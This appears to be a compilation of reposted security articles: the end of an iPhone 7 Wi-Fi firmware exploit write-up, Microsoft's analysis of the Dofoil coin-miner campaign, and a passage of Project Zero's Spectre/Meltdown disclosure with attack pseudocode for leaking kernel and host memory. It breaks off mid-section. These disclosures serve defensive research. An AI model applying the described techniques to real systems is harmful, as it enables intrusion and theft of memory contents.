Summing up all the work above, we’ve finally written a complete exploit, allowing code execution on the Wi-Fi chip of the iPhone 7. You can find the complete exploit here.

The exploit has been tested against the Wi-Fi firmware present in iOS 10.2 (14C92). The vulnerability is present in versions of iOS up to (and including) iOS 10.3.3. Researchers wishing to utilise the exploit on different iDevices or different versions, would be required to adjust the necessary symbols used by the exploit (see “exploit/symbols.py”).

Note that the exploit continuously attempts to install the backdoor into the Wi-Fi firmware, until it is successful. For any unsuccessful attempt, the firmware simply silently reboots, allowing the exploit to continue along. Moreover, due to a clever feat of engineering by Apple, rebooting the firmware does not interrupt ongoing connections; instead, they are continued as the chip reboots, allowing for a rather stealthy attack.


Wrapping Up

Over the course of this blog post we performed a deep dive into the Wi-Fi firmware present on the iPhone 7. Our exploration led us to discover new attack surfaces, several added mitigations, and multiple vulnerabilities.

By exploiting one of the aforementioned vulnerabilities, we were able to gain control over the Wi-Fi SoC, allowing us to gain a foothold on the device itself, directly over-the-air. In doing so, we also bypassed several of the firmware’s exploit mitigations, demonstrating how they can be reinforced in future versions.

In the next blog post, we’ll complete our journey towards full control over the target device, by devising a full exploit chain allowing us to leverage our newly acquired control over the Wi-Fi chip in order to launch an attack against iOS itself. Ultimately, we’ll construct an over-the-air exploit allowing complete control over the iOS kernel.


Behavior monitoring combined with machine learning spoils a massive Dofoil coin mining campaign
17.3.2018 Microsoft
Computer Attack blog
in Windows, Windows Defender Advanced Threat Protection, Endpoint Security, Incident Response, Threat Protection, Research
Update: Further analysis of this campaign points to a poisoned update for a peer-to-peer (P2P) application. For more information, read Poisoned peer-to-peer app kicked off Dofoil coin miner outbreak.

Just before noon on March 6 (PST), Windows Defender Antivirus blocked more than 80,000 instances of several sophisticated trojans that exhibited advanced cross-process injection techniques, persistence mechanisms, and evasion methods. Behavior-based signals coupled with cloud-powered machine learning models uncovered this new wave of infection attempts. The trojans, which are new variants of Dofoil (also known as Smoke Loader), carry a coin miner payload. Within the next 12 hours, more than 400,000 instances were recorded, 73% of which were in Russia. Turkey accounted for 18% and Ukraine 4% of the global encounters.

Figure 1: Windows Defender ATP machine timeline view with Windows Defender Exploit Guard event

Figure 1: Windows Defender ATP machine timeline view with Windows Defender Exploit Guard event

Figure 1: Geographic distribution of the Dofoil attack components

Windows Defender AV initially flagged the attack’s unusual persistence mechanism through behavior monitoring, which immediately sent this behavior-based signal to our cloud protection service.

Within milliseconds, multiple metadata-based machine learning models in the cloud started blocking these threats at first sight.
Seconds later, our sample-based and detonation-based machine learning models also verified the malicious classification. Within minutes, detonation-based models chimed in and added additional confirmation.
Within minutes, an anomaly detection alert notified us about a new potential outbreak.
After analysis, our response team updated the classification name of this new surge of threats to the proper malware families. People affected by these infection attempts early in the campaign would have seen blocks under machine learning names like Fuery, Fuerboos, Cloxer, or Azden. Later blocks show as the proper family names, Dofoil or Coinminer.
Windows 10, Windows 8.1, and Windows 7 users running Windows Defender AV or Microsoft Security Essentials are all protected from this latest outbreak.

Figure 2. Layered machine learning defenses in Windows Defender AV

Figure 2. Layered machine learning defenses in Windows Defender AV

Artificial intelligence and behavior-based detection in Windows Defender AV has become one of the mainstays of our defense system. The AI-based pre-emptive protection provided against this attack is similar to how layered machine learning defenses stopped an Emotet outbreak last month.

Code injection and coin mining
Dofoil is the latest malware family to incorporate coin miners in attacks. Because the value of Bitcoin and other cryptocurrencies continues to grow, malware operators see the opportunity to include coin mining components in their attacks. For example, exploit kits are now delivering coin miners instead of ransomware. Scammers are adding coin mining scripts in tech support scam websites. And certain banking trojan families added coin mining behavior.

The Dofoil campaign we detected on March 6 started with a trojan that performs process hollowing on explorer.exe. Process hollowing is a code injection technique that involves spawning a new instance of legitimate process (in this case c:\windows\syswow64\explorer.exe) and then replacing the legitimate code with malware.

Figure 3. Windows Defender ATP detection for process hollowing (SHA-256: d191ee5b20ec95fe65d6708cbb01a6ce72374b309c9bfb7462206a0c7e039f4d, detected by Windows Defender AV as TrojanDownloader:Win32/Dofoil.AB)

The hollowed explorer.exe process then spins up a second malicious instance, which drops and runs a coin mining malware masquerading as a legitimate Windows binary, wuauclt.exe.

Figure 4. Windows Defender ATP detection for coin mining malware (SHA-256: 2b83c69cf32c5f8f43ec2895ec9ac730bf73e1b2f37e44a3cf8ce814fb51f120, detected by Windows Defender AV as Trojan:Win32/CoinMiner.D)

Even though it uses the name of a legitimate Windows binary, it’s running from the wrong location. The command line is anomalous compared to the legitimate binary. Additionally, the network traffic from this binary is suspicious.

Windows Defender ATP alert process tree showing anomalous IP communicationsFigure

5. Windows Defender ATP alert process tree showing anomalous IP communications

Windows Defender ATP showing suspicious network activity

Windows Defender ATP showing suspicious network activity

Figure 6. Windows Defender ATP showing suspicious network activity

Windows Defender ATP alert process tree

Windows Defender ATP alert process treeFigure 7. Windows Defender ATP alert process tree showing hollowed explorer.exe process making suspicious connections

Dofoil uses a customized mining application. Based on its code, the coin miner supports NiceHash, which means it can mine different cryptocurrencies. The samples we analyzed mined Electroneum coins.

Persistence
For coin miner malware, persistence is key. These types of malware employ various techniques to stay undetected for long periods of time in order to mine coins using stolen computer resources.

To stay hidden, Dofoil modifies the registry. The hollowed explorer.exe process creates a copy of the original malware in the Roaming AppData folder and renames it to ditereah.exe. It then creates a registry key or modifies an existing one to point to the newly created malware copy. In the sample we analyzed, the malware modified the OneDrive Run key.
Windows Defender ATP alert process tree showing creation of new malware process

Windows Defender ATP alert process tree showing creation of new malware process

Figure 8. Windows Defender ATP alert process tree showing creation of new malware process (SHA-256: d191ee5b20ec95fe65d6708cbb01a6ce72374b309c9bfb7462206a0c7e039f4d) and registry modification

Command-and-control communication
Dofoil is an enduring family of trojan downloaders. These connect to command and control (C&C) servers to listen for commands to download and install malware. In the March 6 campaign, Dofoil’s C&C communication involves the use of the decentralized Namecoin network infrastructure .

The hollowed explorer.exe process writes and runs another binary, D1C6.tmp.exe (SHA256: 5f3efdc65551edb0122ab2c40738c48b677b1058f7dfcdb86b05af42a2d8299c) into the Temp folder. D1C6.tmp.exe then drops and executes a copy of itself named lyk.exe. Once running, lyk.exe connects to IP addresses that act as DNS proxy servers for the Namecoin network. It then attempts to connect to the C&C server vinik.bit inside the NameCoin infrastructure. The C&C server commands the malware to connect or disconnect to an IP address; download a file from a certain URL and execute or terminate the specific file; or sleep for a period of time.

 Windows Defender ATP alert process tree showing creation of the temporary file, D1C6.tmp.exe

Figure 9. Windows Defender ATP alert process tree showing creation of the temporary file, D1C6.tmp.exe (SHA256: 5f3efdc65551edb0122ab2c40738c48b677b1058f7dfcdb86b05af42a2d8299c)

 

Figure 10. Windows Defender ATP alert process tree showing lyk.exe connecting to IP addresses

Stay protected with Windows 10
With the rise in valuation of cryptocurrencies, cybercriminal groups are launching more and more attacks to infiltrate networks and quietly mine for coins.

Windows Defender AV’s layered approach to security, which uses behavior-based detection algorithms, generics, and heuristics, as well as machine learning models in both the client and the cloud, provides real-time protection against new threats and outbreaks.

As demonstrated, Windows Defender Advanced Threat Protection (Windows Defender ATP) flags malicious behaviors related to installation, code injection, persistence mechanisms, and coin mining activities. Security operations can use the rich detection libraries in Windows Defender ATP to detect and respond to anomalous activities in the network. Windows Defender ATP also integrates protections from Windows Defender AV, Windows Defender Exploit Guard, and Windows Defender Application Guard, providing a seamless security management experience.

Windows 10 S, a special configuration of Windows 10, helps protect against coin miners and other threats. Windows 10 S works exclusively with apps from the Microsoft Store and uses Microsoft Edge as the default browser, providing Microsoft verified security.


Reading privileged memory with a side-channel
4.1.2017 Google Projet Zero
Vulnerebility blog

We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.

Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].

So far, there are three known variants of the issue:

Variant 1: bounds check bypass (CVE-2017-5753)
Variant 2: branch target injection (CVE-2017-5715)
Variant 3: rogue data cache load (CVE-2017-5754)

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

Spectre (variants 1 and 2)
Meltdown (variant 3)

During the course of our research, we developed the following proofs of concept (PoCs):

A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian's distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn't been tested.)
A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

For interesting resources around this topic, look down into the "Literature" section.

A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.

We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

The PoC code and the writeups that we sent to the CPU vendors will be made available at a later date.
Tested Processors
Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called "Intel Haswell Xeon CPU" in the rest of this document)
AMD FX(tm)-8320 Eight-Core Processor (called "AMD FX CPU" in the rest of this document)
AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called "AMD PRO CPU" in the rest of this document)
An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called "ARM Cortex A57" in the rest of this document)
Glossary
retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.

logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

cached/uncached data: In this blogpost, "uncached" data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.

speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.

mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.
Variant 1: Bounds check bypass
This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:

Intel Haswell Xeon CPU, eBPF JIT is off (default state)
Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
AMD PRO CPU, eBPF JIT is on (non-default state)

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.
Theoretical explanation
The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 ("Branch Prediction"):

Branch prediction predicts the branch target and enables the
processor to begin executing instructions long before the branch
true execution path is known.

In section 2.3.5.2 ("L1 DCache"):

Loads can:
[...]
Be carried out speculatively, before preceding branches are resolved.
Take cache misses out of order and in an overlapped manner.

Intel's Software Developer's Manual [7] states in Volume 3A, section 11.7 ("Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors"):

Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.
Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).

struct array {
unsigned long length;
unsigned char data[];
};
struct array *arr1 = ...;
unsigned long untrusted_offset_from_caller = ...;
if (untrusted_offset_from_caller < arr1->length) {
unsigned char value = arr1->data[untrusted_offset_from_caller];
...
}
However, in the following code sample, there's an issue. If arr1->length, arr2->data[0x200] and arr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:

load value = arr1->data[untrusted_offset_from_caller]
start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

struct array {
unsigned long length;
unsigned char data[];
};
struct array *arr1 = ...; /* small array */
struct array *arr2 = ...; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = ...;
if (untrusted_offset_from_caller < arr1->length) {
unsigned char value = arr1->data[untrusted_offset_from_caller];
unsigned long index2 = ((value&1)*0x100)+0x200;
if (index2 < arr2->length) {
unsigned char value2 = arr2->data[index2];
}
}

After the execution has been returned to the non-speculative path because the processor has noticed that untrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] and arr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300 - which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.
Attacking the kernel
This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.

The Linux kernel supports eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:

either interpreted by an in-kernel bytecode interpreter
or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.

Whether the JIT engine is enabled depends on a run-time configuration setting - but at least on the tested Intel processor, the attack works independent of that setting.

Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.

eBPF's data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.

Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn't be a precondition in principle).

Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array's length to be slow on other physical CPU cores (intentional false sharing).

The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling through prog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.

Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 215 adjacent userspace memory mappings [9], each consisting of 24 pages, are created at the userspace address user_mapping_area, covering a total area of 231 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.

This permits the attack to be carried out in steps of 231 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 24 pages of user_mapping_area have to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.

When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). The remaining part of the address of user_mapping_area is the middle.

The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.

At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:

uint64_t bitmask = <runtime-configurable>;
uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
uint64_t secret_data = bpf_map_read(array=victim_array, index=secret_data_offset);
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);

This program reads 8-byte-aligned 64-bit values from an eBPF data array "victim_map" at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 27 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.

This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_map that causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.
Variant 2: Branch target injection
This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian's distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.
Basics
Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other's branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).

The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won't know the true destination of the jump, and it won't be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.
Haswell branch prediction internals
Some of the internals of the branch prediction implemented by Intel's processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.

This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

Haswell seems to have multiple branch prediction mechanisms that work very differently:

A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
(There is also a specialized return predictor, according to Intel's optimization manual, but we haven't analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)
Generic predictor
The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn't store the full, absolute destination address.

Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:

bit A
bit B
0x40.0000
0x2000
0x80.0000
0x4000
0x100.0000
0x8000
0x200.0000
0x1.0000
0x400.0000
0x2.0000
0x800.0000
0x4.0000
0x2000.0000
0x10.0000
0x4000.0000
0x20.0000

In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can't distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.

When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn't been verified.

Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 232 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.
Indirect call predictor
The inputs of the BTB lookup for this mechanism seem to be:

The low 12 bits of the address of the source instruction (we are not sure whether it's the address of the first or the last byte) or a subset of them.
The branch history buffer state.

If the indirect call predictor can't resolve a branch, it is resolved by the generic predictor instead. Intel's optimization manual hints at this behavior: "Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior."

The branch history buffer (BHB) stores information about the last 29 taken branches - basically a fingerprint of recent control flow - and is used to allow better prediction of indirect calls that can have multiple targets.

The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):

void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {
*bhb_state <<= 2;
*bhb_state ^= (dst & 0x3f);
*bhb_state ^= (src & 0xc0) >> 6;
*bhb_state ^= (src & 0xc00) >> (10 - 2);
*bhb_state ^= (src & 0xc000) >> (14 - 4);
*bhb_state ^= (src & 0x30) << (6 - 4);
*bhb_state ^= (src & 0x300) << (8 - 8);
*bhb_state ^= (src & 0x3000) >> (12 - 10);
*bhb_state ^= (src & 0x30000) >> (16 - 12);
*bhb_state ^= (src & 0xc0000) >> (18 - 14);
}

Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn't been understood yet.

The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code - for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).
Reverse-Engineering Branch Predictor Internals
This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn't keep a detailed record of what we were doing.

We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked - however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.

Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to "recent program behavior" in Intel's optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.

In this test, the injection success rate was above 99%, giving us a base setup for future experiments.

We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%).
Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.

The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.

Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don't influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn't influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).

Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn't store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.

However, a history buffer needs to "forget" about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this can not cause information in bits that are already present in the history buffer to propagate downwards - and given that, upwards combination of information probably wouldn't be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).

If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]

With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.
Reading host memory from a KVM guest
Locating the host kernel
Our PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:

lower 20 bits of the address of kvm-intel.ko
full address of kvm.ko
full address of vmlinux

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.

In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.

The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.
Misprediction rates are measured as in the section "Reverse-Engineering Branch Predictor Internals", using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.

With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) - by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.

At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.
For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.

kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to 0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section "Generic Predictor" apply; there will be 24-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/24=1024.

To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 220) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 216 remaining possibilities for the load address of kvm.ko.

Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.
Because (as far as we know) a simple hypercall won't actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.

The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.
Identifying cache sets
